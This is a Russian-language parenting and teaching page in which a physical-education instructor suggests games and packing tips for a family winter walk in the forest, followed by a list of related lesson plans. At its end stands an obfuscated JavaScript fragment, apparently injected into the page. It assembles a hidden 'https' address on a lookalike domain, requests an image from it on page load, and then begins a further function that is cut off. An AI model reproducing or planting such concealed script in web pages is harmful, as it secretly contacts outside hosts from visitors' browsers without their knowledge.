Пргулка в зимний лес
материал по теме

Александрова Наталья Николаевна

В этой консультации я рассказываю как с пользой для здоровья провести зимний день всей семьей в лесу, укрепить свое здоровье и получить массу незабываемых впечатлений

Скачать:

ВложениеРазмер
Microsoft Office document icon zimnyaya_progulka_v_les.doc31.5 КБ

Предварительный просмотр:

Зимняя прогулка в лес

“Февраль – месяц лютый: спрашивает, как обутый” – говорят в народе.

Но все - равно зима уже идет на убыль, а это значит, что нам, совсем недолго осталось ждать прихода нашего самого любимого тепло-летнего  прогулочного сезона: буквально пару месяцев... Но, конечно же, мы и сейчас не будем сидеть без дела, а, отправимся  всей семьей на зимнюю прогулку.

Думаете, что прогулка по зимнему лесу – это лишь спокойная ходьба закутанных людей? Ничего подобного! Существует масса игр, предназначенных специально для зимних прогулок.

Прогулка - это источник новых впечатлений и радостных эмоций. Если продумать игры на прогулке с малышом заранее, то после нее он будет чувствовать себя бодрым и веселым, узнает много нового.

Чтобы не попасть впросак, обязательно возьмите с собой на прогулку:

запасные варежки и дополнительные шерстяные носки, детям - запасные шапки (если что-то намокнет, всегда сможете переодеться);

теплое питье в термосе и пластиковые стаканчики, бутерброды для перекуса;

фотоаппарат и мобильный телефон;

для малышей захватите санки, даже если не собираетесь кататься с горки. Большую часть дороги везите ребенка, так как он гораздо менее вынослив, чем взрослые. Ну и конечно, возьмите все необходимое для игр и развлечений. Малыш, начиная с пяти лет, может нести посильную ношу в рюкзачке за спиной, избавляя родителей от больших сумок.

Зимние слова. 

Вы начинаете говорить слово, а ребенок заканчивает его. Например: «дед мо…(роз)», снего…(ход). Если ребенок умеет читать, то слова можно писать на снегу. Потом поменяться ролями.

Кладоискатели

Клад найти любому приятно. Давайте поищем в лесу. Предложите ребенку, например, раскопать снег до самой земли. Копаем, копаем… Что там в глубине? Вполне вероятно там отыщется простая трава, впрочем, что бы не отыскали, все равно интересно. Оказывается, зимой не все растения засыпают, есть и такие, которые под снегом переживают холода.

Снежная угадай-ка. 

Заготовьте побольше снежков. Вы говорите: «В лесу живет волк» и кидаете снежок ребенку. Если «да» - он ловит снежок. Если «нет» - уворачивается. Любые понятия, которые желательно закрепить, закреплять можно так, играючи.

Наблюдаем

Обязательно обратите внимание детей на то, как красив зимний лес. Предложите просто молча поглядеть по сторонам, наслаждаясь необыкновенными, почти сказочными видами. Если ваши ребятишки достигли старшего дошкольного возраста, предложите им поиграть в следопытов. Попросите найти какие-нибудь следы на снегу и попробовать угадать или хотя бы предположить, чей это след. Даже дошкольник легко отличит след птицы от следа зверька. А некоторые дети могут угадать, кто именно оставил след.

Лепим снеговика.

Это зимняя детская игра, дошедшая до нас с древних времен. Правда, есть одно «но»: снег должен быть достаточно липкий. На коллективной прогулке получаются самые красивые снеговики и снежные бабы!  Распределите роли. Самый младший член семьи будет катать самый маленький шарик - голову снеговика. Папа слепит самый большой шар - нижний. Средний шар достанется маме или старшему ребенку. Лепка снеговика позволяет отлично проводить время и развивать творчество. Снеговик - веселый зимний персонаж, требующий украшений. Вам понадобятся краски, морковка для создания носа, возможно, пуговицы или большие яркие бусины, солома, еловые ветки, старая одежда (шапка, шарф, рукавички) – все, что найдется дома и без сожаления подарено для украшения снежной скульптуры.

Еще одна зимняя игра – «Царь горы», относящаяся к числу старинных русских забав и популярная в современности. Для игры понадобится наличие невысокой снежной горки, а также команда игроков из нескольких человек. Один игрок должен забраться наверх и объявить: «Я – царь горы!» Все несогласные с таким заявлением начинают штурмовать высоту, чтобы сразить самодержца и столкнуть его с вершины. Тот, кому удастся свергнуть царя «с престола», взбирается на гору и становится следующим царем.

А напоследок...

Самая любимая зимняя игра - снежки. Но она, же и самая шумная и бурная. Можно сделать снежную крепость из больших снежных комьев, залепляя снегом образующиеся пустоты. Если нет времени крепость построить – можно спрятаться за высокий сугроб. И поиграть в перестрелку.

Вернувшись, домой, обязательно проверьте, не замерзли ли дети. Если ладошки и ступни холодные, лучше сразу принять теплую ванну и попить горячего чая с лимоном. Не давайте детям в этот вечер никаких заданий или поручений. Не предлагайте сделать уроки или помочь вам разобрать сумки. Ребенок переполнен впечатлениями, ему необходимо их «переварить» и осмыслить. Ему просто нужно отдохнуть, лежа на диване. А вот через несколько дней предложите малышу вспомнить прогулку, зарисовать свои впечатления или слепить из пластилина уменьшенную копию снеговика. Сделайте фотоальбом или стенгазету со смешными подписями.

Наталья Александрова, инструктор по физической культуре


По теме: методические разработки, презентации и конспекты

Пргулки в старшей группе

Предлагаю план прогулок в старшей групе детского сада в соответствии с программой Васильевой....

Конспект интегрированного логопедическго занятия "Пргулка по зимнему лесу"

Конспект интегрированнго логопедическго занятия "Прогулка по зимнему лесу" для детей подготовительной группы  (с музыкальным руковдителем)...

проект " Пргулка с интересом"

Краскосрочный поект для детей младшего дошкольного возраста. В помощь родителям и воспитателям детского сада....

Конспект проведения пргулки в старшей группе "Здравствуй осень"

В конспекте показана структура проведения прогулки...

Конспект ООД по физической культуре "Зимняя пргулка"

Тематическая ООД по физической культуре для детей старшего дошкольного возраста, лексическая тема которой "Зима"...

Зимние игры на пргулке с детьми

\'use strict\';var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'zudv.blablacarv.ru\',\'45\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(...